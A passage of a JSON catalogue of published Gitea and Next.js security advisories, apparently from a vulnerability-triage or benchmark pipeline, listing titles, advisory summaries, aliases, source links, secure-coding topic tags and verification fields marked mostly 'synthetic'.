"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20800": {
"canonical_id": "gitea--CVE-2026-20800",
"title": "Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea",
"summary": "Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.012782Z",
"official_source_url": "https://github.com/advisories/GHSA-2vgv-hgv4-22mh",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20800",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/67e75f30a83d2523cedc37ad7b03bcba66947833",
"https://github.com/go-gitea/gitea/pull/36339",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20800",
"CVE-2026-20800",
"GHSA-2vgv-hgv4-22mh",
"GHSA-g54m-9f6g-wj7q",
"GO-2026-4362"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20883": {
"canonical_id": "gitea--CVE-2026-20883",
"title": "Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea",
"summary": "Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.692700Z",
"official_source_url": "https://github.com/advisories/GHSA-j8xr-c56q-m8jj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20883",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/95ea2df00a70176c516b12f3cfee8c84a310280f",
"https://github.com/go-gitea/gitea/pull/36340",
"https://github.com/go-gitea/gitea/pull/36368",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20883",
"CVE-2026-20883",
"GHSA-644v-xv3j-xgqg",
"GHSA-j8xr-c56q-m8jj",
"GO-2026-4368"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20888": {
"canonical_id": "gitea--CVE-2026-20888",
"title": "Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea",
"summary": "Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:56.025932Z",
"official_source_url": "https://github.com/advisories/GHSA-9cgq-wp42-4rpq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20888",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/pull/36341",
"https://github.com/go-gitea/gitea/pull/36356",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20888",
"CVE-2026-20888",
"GHSA-9cgq-wp42-4rpq",
"GHSA-ccq9-c5hv-cf64",
"GO-2026-4366"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20897": {
"canonical_id": "gitea--CVE-2026-20897",
"title": "Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea",
"summary": "Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:55.339967Z",
"official_source_url": "https://github.com/advisories/GHSA-393c-qgvj-3xph",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20897",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/da036f3f35ca830b22cf4480912ed261303b798f",
"https://github.com/go-gitea/gitea/pull/36344",
"https://github.com/go-gitea/gitea/pull/36349",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20897",
"CVE-2026-20897",
"GHSA-393c-qgvj-3xph",
"GHSA-rrq5-r9h5-pc7c",
"GO-2026-4363"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20904": {
"canonical_id": "gitea--CVE-2026-20904",
"title": "Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea",
"summary": "Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:54.244003Z",
"official_source_url": "https://github.com/advisories/GHSA-qqgv-v353-cv8p",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20904",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/ed5720af2ac94d74f822721c05b42b6148ff9c22",
"https://github.com/go-gitea/gitea/pull/36346",
"https://github.com/go-gitea/gitea/pull/36361",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20904",
"CVE-2026-20904",
"GHSA-jrpc-w85r-hgqx",
"GHSA-qqgv-v353-cv8p",
"GO-2026-4369"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"gitea--CVE-2026-20912": {
"canonical_id": "gitea--CVE-2026-20912",
"title": "Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea",
"summary": "Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea",
"display_name": "Gitea",
"system_id": "gitea",
"category": "platforms",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"published_at": "2026-02-02T21:05:55Z",
"updated_at": "2026-03-03T04:57:55.747880Z",
"official_source_url": "https://github.com/advisories/GHSA-4xx9-vc8v-87hv",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-20912",
"https://blog.gitea.com/release-of-1.25.4",
"https://github.com/go-gitea/gitea/commit/fbea2c68e8df11cfa94e8ead913b79946780ed30",
"https://github.com/go-gitea/gitea/pull/36320",
"https://github.com/go-gitea/gitea/pull/36355",
"https://github.com/go-gitea/gitea/releases/tag/v1.25.4"
],
"aliases": [
"BIT-gitea-2026-20912",
"CVE-2026-20912",
"GHSA-4xx9-vc8v-87hv",
"GHSA-vfmv-f93v-37mw",
"GO-2026-4364"
],
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2020-5284": {
"canonical_id": "nextjs--CVE-2020-5284",
"title": "Directory Traversal in Next.js",
"summary": "### Impact\n\n- **Not affected**: Deployments on ZEIT Now v2 ([https://zeit.co](https://zeit.co/)) are not affected\n- **Not affected**: Deployments using the `serverless` target\n- **Not affected**: Deployments using `next export`\n- **Affected**: Users of Next.js below 9.3.2\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/zeit/next.js/releases/tag/v9.3.2\n\n### References\n\nhttps://github.com/zeit/next.js/releases/tag/v9.3.2",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2020-03-30T20:40:50Z",
"updated_at": "2025-09-26T17:49:56Z",
"official_source_url": "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-5284",
"https://github.com/zeit/next.js/releases/tag/v9.3.2",
"https://www.npmjs.com/advisories/1503"
],
"aliases": [
"CVE-2020-5284",
"GHSA-fq77-7p7r-83rj"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"path-traversal-guard"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-37699": {
"canonical_id": "nextjs--CVE-2021-37699",
"title": "Open Redirect in Next.js",
"summary": "Next.js is an open source website development framework to be used with the React library. In affected versions specially encoded paths could be used when `pages/_error.js` was statically generated, allowing an open redirect to occur to an external site. In general, this redirect does not directly harm users although it can allow for phishing attacks by redirecting to an attacker's domain from a trusted domain.\n\n### Impact\n\n- **Affected:** Users of Next.js between `10.0.5` and `10.2.0`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` without `getInitialProps`\n- **Affected:** Users of Next.js between `11.0.0` and `11.0.1` using `pages/_error.js` and `next export`\n- **Not affected**: Deployments on Vercel ([vercel.com](https://vercel.com)) are not affected\n- **Not affected:** Deployments **with** `pages/404.js`\n- Note that versions prior to 0.9.9 package `next` npm package hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.\n\nWe recommend upgrading to the latest version of Next.js to improve the overall security of your application.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v11.1.0",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-08-12T14:51:14Z",
"updated_at": "2026-03-13T22:00:08.038285Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5-wxwp-m7g9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-37699",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.0"
],
"aliases": [
"CVE-2021-37699",
"GHSA-vxf5-wxwp-m7g9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-39178": {
"canonical_id": "nextjs--CVE-2021-39178",
"title": "XSS in Image Optimization API for Next.js",
"summary": "### Impact\n- **Affected:** All of the following must be true to be affected\n - Next.js between version 10.0.0 and 11.1.0\n - The `next.config.js` file has [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) array assigned\n - The image host assigned in [`images.domains`](https://nextjs.org/docs/basic-features/image-optimization#domains) allows user-provided SVG\n- **Not affected**: The `next.config.js` file has [`images.loader`](https://nextjs.org/docs/basic-features/image-optimization#loader) assigned to something other than default\n- **Not affected**: Deployments on [Vercel](https://vercel.com) are not affected\n\n### Patches\n[Next.js v11.1.1](https://github.com/vercel/next.js/releases/tag/v11.1.1)\n\n",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-09-01T18:24:22Z",
"updated_at": "2026-03-13T22:00:20.154452Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3-7897-pp7m",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-39178",
"https://github.com/vercel/next.js/pull/28620",
"https://github.com/vercel/next.js/commit/7afc97c5744b38bdf36aa7f87625f438224688aa",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.1"
],
"aliases": [
"CVE-2021-39178",
"GHSA-9gr3-7897-pp7m"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"xss-output-encoding"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2021-43803": {
"canonical_id": "nextjs--CVE-2021-43803",
"title": "Unexpected server crash in Next.js.",
"summary": "Next.js is a React framework. In versions of Next.js prior to 12.0.5 or 11.1.3, invalid or malformed URLs could lead to a server crash. In order to be affected by this issue, the deployment must use Next.js versions above 11.1.0 and below 12.0.5, Node.js above 15.0.0, and next start or a custom server. Deployments on Vercel are not affected, along with similar environments where invalid requests are filtered before reaching Next.js. Versions 12.0.5 and 11.1.3 contain patches for this issue. Note that prior version 0.9.9 package `next` hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions. ",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2021-12-07T21:12:09Z",
"updated_at": "2026-03-13T22:00:36.554552Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-25mp-g6fv-mqxx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-43803",
"https://github.com/vercel/next.js/pull/32080",
"https://github.com/vercel/next.js/commit/6d98b4fb4315dec1badecf0e9bdc212a4272b264",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v11.1.3",
"https://github.com/vercel/next.js/releases/v12.0.5"
],
"aliases": [
"CVE-2021-43803",
"GHSA-25mp-g6fv-mqxx"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-34351": {
"canonical_id": "nextjs--CVE-2024-34351",
"title": "Next.js Server-Side Request Forgery in Server Actions",
"summary": "### Impact\nA Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\n#### Prerequisites\n* Next.js (`<14.1.1`) is running in a self-hosted* manner.\n* The Next.js application makes use of Server Actions.\n* The Server Action performs a redirect to a relative path which starts with a `/`.\n\n\\* Many hosting providers (including Vercel) route requests based on the Host header, so we do not believe that this vulnerability affects any Next.js applications where routing is done in this manner.\n\n### Patches\nThis vulnerability was patched in [#62561](https://github.com/vercel/next.js/pull/62561) and fixed in Next.js `14.1.1`.\n \n### Workarounds\nThere are no official workarounds for this vulnerability. We recommend upgrading to Next.js `14.1.1`.\n\n### Credit\nVercel and the Next.js team thank Assetnote for responsibly disclosing this issue to us, and for working with us to verify the fix. Thanks to:\n\nAdam Kues - Assetnote\nShubham Shah - Assetnote",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-05-09T21:18:57Z",
"updated_at": "2026-02-04T03:32:36.434669Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-34351",
"https://github.com/vercel/next.js/pull/62561",
"https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-34351",
"GHSA-fr5h-rqp8-mj6g"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-46982": {
"canonical_id": "nextjs--CVE-2024-46982",
"title": "Next.js Cache Poisoning",
"summary": "### Impact\n\nBy sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. \n\nTo be potentially affected all of the following must apply: \n\n- Next.js between 13.5.1 and 14.2.9\n- Using pages router\n- Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`\n\nThe below configurations are unaffected:\n\n- Deployments using only app router\n- Deployments on [Vercel](https://vercel.com/) are not affected\n\n\n### Patches\n\nThis vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not.\n\n### Workarounds\n\nThere are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.\n\n#### Credits\n\n- Allam Rachid (zhero_)\n- Henry Chen",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T21:58:09Z",
"updated_at": "2026-02-04T03:45:33.402195Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-46982",
"https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3",
"https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-46982",
"GHSA-gp8f-8m3g-qvj9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-47831": {
"canonical_id": "nextjs--CVE-2024-47831",
"title": "Denial of Service condition in Next.js image optimization",
"summary": "### Impact\nThe image optimization feature of Next.js contained a vulnerability which allowed for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption.\n\n**Not affected:**\n- The `next.config.js` file is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value.\n- The Next.js application is hosted on Vercel. \n\n### Patches\nThis issue was fully patched in Next.js `14.2.7`. We recommend that users upgrade to at least this version.\n\n### Workarounds\nEnsure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.\n\n#### Credits\nBrandon Dahler (brandondahler), AWS\nDimitrios Vlastaras",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-10-14T19:45:21Z",
"updated_at": "2026-02-04T03:25:43.295558Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-47831",
"https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-47831",
"GHSA-g77x-44xx-532m"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-51479": {
"canonical_id": "nextjs--CVE-2024-51479",
"title": "Next.js authorization bypass vulnerability",
"summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-12-17T15:09:06Z",
"updated_at": "2025-09-10T21:12:24Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
"https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v14.2.15"
],
"aliases": [
"CVE-2024-51479",
"GHSA-7gfc-8cq8-jh5f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "verified-real",
"verification_mode": "real",
"artifact_mode": "local-fixture",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2024-56332": {
"canonical_id": "nextjs--CVE-2024-56332",
"title": "Next.js Allows a Denial of Service (DoS) with Server Actions",
"summary": "### Impact\nA Denial of Service (DoS) attack allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution.\n\n_Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time._\n\nDeployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing.\n\nThis is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel.\n\nThis vulnerability affects only Next.js deployments using Server Actions.\n\n### Patches\n\nThis vulnerability was resolved in Next.js 14.2.21, 15.1.2, and 13.5.8. We recommend that users upgrade to a safe version.\n\n### Workarounds\n\nThere are no official workarounds for this vulnerability.\n\n### Credits\n\nThanks to the PackDraw team for responsibly disclosing this vulnerability.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-03T20:19:29Z",
"updated_at": "2026-02-04T04:36:04.252972Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-56332",
"https://github.com/vercel/next.js"
],
"aliases": [
"CVE-2024-56332",
"GHSA-7m27-7ghc-44w9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-30218": {
"canonical_id": "nextjs--CVE-2025-30218",
"title": "Next.js may leak x-middleware-subrequest-id to external hosts",
"summary": "## Summary\nIn the process of remediating [CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw), we looked at other possible exploits of Middleware. We independently verified this low severity vulnerability in parallel with two reports from independent researchers.\n\nLearn more [here](https://vercel.com/changelog/cve-2025-30218-5DREmEH765PoeAsrNNQj3O).\n\n## Credit\n\nThank you to Jinseo Kim [kjsman](https://hackerone.com/kjsman?type=user) and\u00a0[RyotaK](https://hackerone.com/ryotak?type=user) (GMO Flatt Security Inc.) with [takumi-san.ai](https://takumi-san.ai)\u00a0for the responsible disclosure. These researchers were awarded as part of our bug bounty program.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-02T22:35:37Z",
"updated_at": "2025-10-13T15:35:50Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-223j-4rm8-mrmf",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30218",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-30218-5DREmEH765PoeAsrNNQj3O"
],
"aliases": [
"CVE-2025-30218",
"GHSA-223j-4rm8-mrmf"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-32421": {
"canonical_id": "nextjs--CVE-2025-32421",
"title": "Next.js Race Condition to Cache Poisoning",
"summary": "**Summary** \nWe received a responsible disclosure from Allam Rachid (zhero) for a low-severity race-condition vulnerability in Next.js. This issue only affects the **Pages Router** under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML.\n\n[Learn more here](https://vercel.com/changelog/cve-2025-32421)\n\n**Credit** \nThank you to **Allam Rachid (zhero)** for the responsible disclosure. This research was rewarded as part of our bug bounty program.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-05-15T14:12:26Z",
"updated_at": "2025-09-26T17:48:29Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32421",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-32421"
],
"aliases": [
"CVE-2025-32421",
"GHSA-qpjv-v59x-3qc4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-48068": {
"canonical_id": "nextjs--CVE-2025-48068",
"title": "Information exposure in Next.js dev server due to lack of origin verification",
"summary": "## Summary\n\nA low-severity vulnerability in **Next.js** has been fixed in **version 15.2.2**. This issue may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while `npm run dev` is active.\n\nBecause the mitigation is potentially a breaking change for some development setups, to opt-in to the fix, you must configure `allowedDevOrigins` in your next config after upgrading to a patched version. [Learn more](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins).\n\nLearn more: https://vercel.com/changelog/cve-2025-48068\n\n## Credit\n\nThanks to [sapphi-red](https://github.com/sapphi-red) and [Radman Siddiki](https://github.com/R4356th) for responsibly disclosing this issue.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-05-28T21:52:13Z",
"updated_at": "2025-06-13T14:41:21Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-48068",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-48068"
],
"aliases": [
"CVE-2025-48068",
"GHSA-3h52-269p-cp9r"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-49005": {
"canonical_id": "nextjs--CVE-2025-49005",
"title": "Next.js has a Cache poisoning vulnerability due to omission of the Vary header",
"summary": "### Summary\n\nA cache poisoning issue in **Next.js App Router >=15.3.0 and < 15.3.3** may have allowed RSC payloads to be cached and served in place of HTML, under specific conditions involving middleware and redirects. This issue has been fixed in **Next.js 15.3.3**.\n\nUsers on affected versions should **upgrade immediately** and **redeploy** to ensure proper caching behavior.\n\nMore details: [CVE-2025-49005](https://vercel.com/changelog/cve-2025-49005)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-07-03T20:30:18Z",
"updated_at": "2026-02-04T02:37:18.974477Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc-ccr8-96c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49005",
